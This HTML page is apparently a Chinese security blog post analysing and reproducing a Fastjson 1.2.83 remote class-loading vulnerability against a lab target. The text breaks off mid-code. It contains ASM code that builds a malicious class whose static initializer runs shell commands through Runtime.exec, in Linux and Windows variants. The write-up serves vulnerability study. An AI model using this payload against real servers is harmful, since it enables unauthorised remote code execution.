<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: light)">
<meta name="theme-color" content="#222" media="(prefers-color-scheme: dark)"><meta name="generator" content="Hexo 8.1.1">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"hai0unu11.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":true,"version":"8.27.0","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-tomorrow"},"copy_button":{"enable":true,"style":"mac"},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="Fastjson 1.2.66 ~ 1.2.83 在 ParserConfig.checkAutoType 中存在一个 @JSONType 注解探测路径的远程类加载漏洞。  https:&#x2F;&#x2F;github.com&#x2F;midisec&#x2F;fastjson-1.2.83-gadget-rce：     属性 说明    影响版本 Fastjson 1.2.66 ~ 1.2.83   利用条件 SafeMode">
<meta property="og:type" content="article">
<meta property="og:title" content="FastJson 1.2.83 漏洞分析">
<meta property="og:url" content="https://hai0unu11.github.io/2026/08/06/FastJson-1-2-83-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/index.html">
<meta property="og:site_name" content="Hai0uBlog">
<meta property="og:description" content="Fastjson 1.2.66 ~ 1.2.83 在 ParserConfig.checkAutoType 中存在一个 @JSONType 注解探测路径的远程类加载漏洞。  https:&#x2F;&#x2F;github.com&#x2F;midisec&#x2F;fastjson-1.2.83-gadget-rce：     属性 说明    影响版本 Fastjson 1.2.66 ~ 1.2.83   利用条件 SafeMode">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-1.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-2.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-3.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-4.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-5.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-6.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-7.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-8.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-9.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-10.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-11.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-12.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-13.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-14.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-15.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-16.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-17.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-18.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-19.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-20.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-21.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-22.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-23.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-24.png">
<meta property="og:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-25.png">
<meta property="article:published_time" content="2026-08-06T09:37:16.000Z">
<meta property="article:modified_time" content="2026-08-07T02:13:22.466Z">
<meta property="article:author" content="Hai0u">
<meta property="article:tag" content="Java">
<meta property="article:tag" content="漏洞分析">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://hai0unu11.github.io/Users/n0ne/Downloads/%E8%AF%AD%E9%9B%80%E5%A4%87%E4%BB%BD/%E4%B8%AA%E4%BA%BA%E7%A9%BA%E9%97%B4/%E6%88%91%E4%B8%AA%E4%BA%BA%E7%9A%84/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/assets/FastJson_1.2.83_%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0-1.png">


<link rel="canonical" href="https://hai0unu11.github.io/2026/08/06/FastJson-1-2-83-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"https://hai0unu11.github.io/2026/08/06/FastJson-1-2-83-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/","path":"2026/08/06/FastJson-1-2-83-漏洞分析/","title":"FastJson 1.2.83 漏洞分析"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>FastJson 1.2.83 漏洞分析 | Hai0uBlog</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Hai0uBlog</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">好好学习，天天向上！</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>







</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E5%BC%80%E5%A7%8B%E8%B0%83%E8%AF%95%EF%BC%9A"><span class="nav-number">1.</span> <span class="nav-text">0x01 开始调试：</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA%EF%BC%9A"><span class="nav-number">1.1.</span> <span class="nav-text">环境搭建：</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#java-1-8-%E8%B0%83%E8%AF%95"><span class="nav-number">1.2.</span> <span class="nav-text">java 1.8 调试</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#java17-%E8%B0%83%E8%AF%95"><span class="nav-number">1.3.</span> <span class="nav-text">java17 调试</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E9%98%B6%E6%AE%B5%EF%BC%9A%E4%B8%8B%E8%BD%BD-jar%EF%BC%8C%E5%88%9B%E5%BB%BA-fd-%E7%BC%93%E5%AD%98"><span class="nav-number">1.3.1.</span> <span class="nav-text">第一阶段：下载 jar，创建 fd 缓存</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%98%B6%E6%AE%B5%E4%BA%8C%EF%BC%9A-%E4%BB%8E-fd-%E8%AF%BB%E5%8F%96%E6%81%B6%E6%84%8F%E7%B1%BB"><span class="nav-number">1.3.2.</span> <span class="nav-text">阶段二： 从 fd 读取恶意类</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#java8%E5%92%8Cjava17%E7%9A%84%E5%8C%BA%E5%88%AB%EF%BC%9A"><span class="nav-number">1.4.</span> <span class="nav-text">java8和java17的区别：</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-%E9%98%B2%E5%BE%A1"><span class="nav-number">2.</span> <span class="nav-text">0x02 防御</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-%E9%81%87%E5%88%B0%E7%9A%84%E9%97%AE%E9%A2%98"><span class="nav-number">3.</span> <span class="nav-text">0x03 遇到的问题</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Hai0u</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
        <div class="back-to-top animated" role="button" aria-label="返回顶部">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://hai0unu11.github.io/2026/08/06/FastJson-1-2-83-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="Hai0u">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hai0uBlog">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="FastJson 1.2.83 漏洞分析 | Hai0uBlog">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          FastJson 1.2.83 漏洞分析
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2026-08-06 17:37:16" itemprop="dateCreated datePublished" datetime="2026-08-06T17:37:16+08:00">2026-08-06</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2026-08-07 10:13:22" itemprop="dateModified" datetime="2026-08-07T10:13:22+08:00">2026-08-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/code-audit/" itemprop="url" rel="index"><span itemprop="name">代码审计</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>Fastjson 1.2.66 ~ 1.2.83 在 <code>ParserConfig.checkAutoType</code> 中存在一个 <code>@JSONType</code> 注解探测路径的远程类加载漏洞。</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/midisec/fastjson-1.2.83-gadget-rce">https://github.com/midisec/fastjson-1.2.83-gadget-rce</a>：</p>
</blockquote>
<table>
<thead>
<tr>
<th>属性</th>
<th>说明</th>
</tr>
</thead>
<tbody><tr>
<td><strong>影响版本</strong></td>
<td>Fastjson 1.2.66 ~ 1.2.83</td>
</tr>
<tr>
<td><strong>利用条件</strong></td>
<td>SafeMode&#x3D;false（默认）；Spring Boot FatJar 部署；目标可出网</td>
</tr>
<tr>
<td><strong>核心特点</strong></td>
<td><strong>无需开启 AutoType</strong>、无需传统 Gadget 链、利用 <code>@JSONType</code> 注解探测机制加载远程类</td>
</tr>
<tr>
<td><strong>JDK 8</strong></td>
<td>单阶段 RCE：直接 <code>http://</code> payload 即可</td>
</tr>
<tr>
<td><strong>JDK 9+&#x2F;17&#x2F;21</strong></td>
<td>需两阶段 <code>jar:http://</code> → <code>/proc/self/fd/N</code> fd bridge 绕过 defineClass <code>//</code> 校验</td>
</tr>
</tbody></table>
<blockquote>
<p>Spring Boot fat-jar 的 LaunchedURLClassLoader 启动阶段会通过 JarFile.registerUrlProtocolHandler() 注册自定义 jar: 协议处理，使该类加载器能够处理 jar:http:&#x2F;&#x2F;、jar:file: 形式的资源路径，而如果由 AppClassLoader 加载，AppClassLoader 根本处理不了 jar: 协议。</p>
</blockquote>
<h2 id="0x01-开始调试："><a href="#0x01-开始调试：" class="headerlink" title="0x01 开始调试："></a>0x01 开始调试：</h2><h3 id="环境搭建："><a href="#环境搭建：" class="headerlink" title="环境搭建："></a>环境搭建：</h3><blockquote>
<p>macos系统</p>
<p>java 1.8</p>
<p>靶场：<a target="_blank" rel="noopener" href="https://github.com/midisec/fastjson-1.2.83-gadget-rce">https://github.com/midisec/fastjson-1.2.83-gadget-rce</a>：</p>
</blockquote>
<p><strong>需要注意的是</strong>：windows和Linux、mac的恶意文件是有区别的</p>
<p>自带的GenProbe.java只适合Linux和mac的</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (execCommand) &#123;</span><br><span class="line">            <span class="type">MethodVisitor</span> <span class="variable">clinit</span> <span class="operator">=</span> cw.visitMethod(Opcodes.ACC_STATIC, <span class="string">&quot;&lt;clinit&gt;&quot;</span>, <span class="string">&quot;()V&quot;</span>, <span class="literal">null</span>, <span class="literal">null</span>);</span><br><span class="line">            clinit.visitCode();</span><br><span class="line">            clinit.visitMethodInsn(Opcodes.INVOKESTATIC, <span class="string">&quot;java/lang/Runtime&quot;</span>, <span class="string">&quot;getRuntime&quot;</span>, <span class="string">&quot;()Ljava/lang/Runtime;&quot;</span>, <span class="literal">false</span>);</span><br><span class="line">            clinit.visitInsn(Opcodes.ICONST_3);</span><br><span class="line">            clinit.visitTypeInsn(Opcodes.ANEWARRAY, <span class="string">&quot;java/lang/String&quot;</span>);</span><br><span class="line">            clinit.visitInsn(Opcodes.DUP); clinit.visitInsn(Opcodes.ICONST_0);</span><br><span class="line">            clinit.visitLdcInsn(<span class="string">&quot;/bin/bash&quot;</span>); clinit.visitInsn(Opcodes.AASTORE);</span><br><span class="line">            clinit.visitInsn(Opcodes.DUP); clinit.visitInsn(Opcodes.ICONST_1);</span><br><span class="line">            clinit.visitLdcInsn(<span class="string">&quot;-c&quot;</span>); clinit.visitInsn(Opcodes.AASTORE);</span><br><span class="line">            clinit.visitInsn(Opcodes.DUP); clinit.visitInsn(Opcodes.ICONST_2);</span><br><span class="line">            clinit.visitLdcInsn(cmd); clinit.visitInsn(Opcodes.AASTORE);</span><br><span class="line">            clinit.visitMethodInsn(Opcodes.INVOKEVIRTUAL, <span class="string">&quot;java/lang/Runtime&quot;</span>, <span class="string">&quot;exec&quot;</span>, <span class="string">&quot;([Ljava/lang/String;)Ljava/lang/Process;&quot;</span>, <span class="literal">false</span>);</span><br><span class="line">            clinit.visitInsn(Opcodes.POP);</span><br><span class="line">            clinit.visitInsn(Opcodes.RETURN);</span><br><span class="line">            clinit.visitMaxs(<span class="number">5</span>, <span class="number">0</span>);</span><br><span class="line">            clinit.visitEnd();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>如果是windows环境，需要自己修改一下，因为windows没有&#x2F;bin&#x2F;bash，需要改成cmd.exe</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (execCommand) &#123;</span><br><span class="line">    <span class="type">MethodVisitor</span> <span class="variable">clinit</span> <span class="operator">=</span> cw.visitMethod(Opcodes.ACC_STATIC, <span class="string">&quot;&lt;clinit&gt;&quot;</span>, <span class="string">&quot;()V&quot;</span>, <span class="literal">null</span>, <span class="literal">null</span>);</span><br><span class="line">    clinit.visitCode();</span><br><span class="line">    clinit.visitMethodInsn(Opcodes.INVOKESTATIC, <span class="string">&quot;java/lang/Runtime&quot;</span>, <span class="string">&quot;getRuntime&quot;</span>, <span class="string">&quot;()Ljava/lang/Runtime;&quot;</span>, <span class="literal">false</span>);</span><br><span class="line">    clinit.visitInsn(Opcodes.ICONST_3);</span><br><span class="line">    clinit.visitTypeInsn(Opcodes.ANEWARRAY, <span class="string">&quot;java/lang/String&quot;</span>);</span><br><span class="line">    clinit.visitInsn(Opcodes.DUP); clinit.visitInsn(Opcodes.ICONST_0);</span><br><span class="line">    clinit.visitLdcInsn(<span class="string">&quot;cmd.exe&quot;</span>); clinit.visitInsn(Opcodes.AASTORE);</span><br><span class="line">    clinit.visitInsn(Opcodes.DUP); clinit.visitInsn(Opcodes.ICONST_1);</span><br><span class="line">    clinit.visitLdcInsn(<span class="string">&quot;/c&quot;</span>); clinit.visitInsn(Opcodes.AASTORE);</span><br><span class="line">    clinit.visitInsn(Opcodes.DUP); 